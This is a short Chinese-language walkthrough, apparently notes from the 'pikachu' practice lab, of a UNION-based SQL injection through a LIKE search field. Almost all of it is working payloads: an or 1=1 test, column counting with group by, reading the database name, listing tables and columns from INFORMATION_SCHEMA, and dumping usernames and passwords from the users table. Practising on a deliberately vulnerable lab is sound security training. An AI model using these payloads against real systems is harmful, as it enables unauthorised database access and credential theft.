1、首先确定:能进行SQL注入
比如推测:
select id, username from like '%username%'
进行SQL注入尝试:username%' or 1=1 #
select id, username from like '% username%' or 1=1 # %'
2、确定了:能进行SQL注入后
用 group by 验证(字段个数)使用二分法
尝试一:
username%' or 1=1 group by 5#
尝试二:
username%' or 1=1 group by 3#
尝试三:
username%' or 1=1 group by 2#
3、根据:确定字段,锁定数据库
username%' union select user(), database() #
4、MySQL查询 INFORMATION_SCHEMA
-- 1、根据(数据库名称)查询(INFORMATION_SCHEMA.TABLES)获取:表名称
username%' union SELECT TABLE_NAME, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'pikachu'#
-- 2、根据(数据库名称、表名称)获取表(所有字段名称)
username%' union SELECT COLUMN_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users' AND TABLE_SCHEMA = 'pikachu' #
5、获取:用户表(账号、密码)
username%' union select username, password from pikachu.users #